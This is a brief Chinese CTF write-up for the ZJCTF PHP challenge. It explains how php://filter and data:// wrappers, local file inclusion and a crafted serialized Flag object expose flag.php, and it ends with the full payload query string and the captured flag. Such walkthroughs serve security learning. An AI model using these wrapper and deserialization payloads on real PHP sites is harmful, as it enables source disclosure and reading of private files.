一共有三个参数,需要考虑传参,php传参,而且是text和file这样的值,基本可以考虑需要用php伪协议 ,
php伪协议是基于文件包含的,文件包含有本地包含和远程包含,
当包含的文件在远程服务器上时,就形成了远程文件包含。
远程文件包含需要在 php.ini 中设置:
allow_url_include = on(是否允许 include/require 远程文件)
allow_url_fopen = on(是否允许打开远程文件)
php伪协议是php支持的协议和封装协议
贴(我从微博里找的,大致内容都有写):
1.条件 file_get_contents($text,'r')==="welcome to the zjctf",
利用在线base4编码工具对welcome to the zjctf进行编码,得到
利用data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=
2.
if里的正则匹配表示file和flag有关系,include()是在php里面调用php文件,从注释里可以看出来调用的是useless.php,根据下面的代码,需要看到useless.php,于是令
file=php://filter/read=convert.base64-encode/resource=useless.php
(不用这个伪协议,useless.php文件直接运行,不会有返回源码,使用伪协议会将源码进行返回)
将下面的base64解码,得到
class Flag{ //flag.php
public $file;
public function __tostring()
{
if(isset($this->file))
{echo file_get_contents($this->file);
echo "<br>";
return ("U R SO CLOSE !///COME ON PLZ");
}
}
}
?>
3.引用的FLAG类,根据注释flag.php,里面的文件是flag.php,我们还需要知道password的值是什么,根据后面的代码,password应该是序列化后的值,这个是就是Flag类下的flag.php,于是序列化后为O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}这就是password的值
4.构造payload:
text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";},进入界面查看源码,可以得到flag
flag{c77bdfc1-8a0f-4ce8-950a-4cdf2f97046d}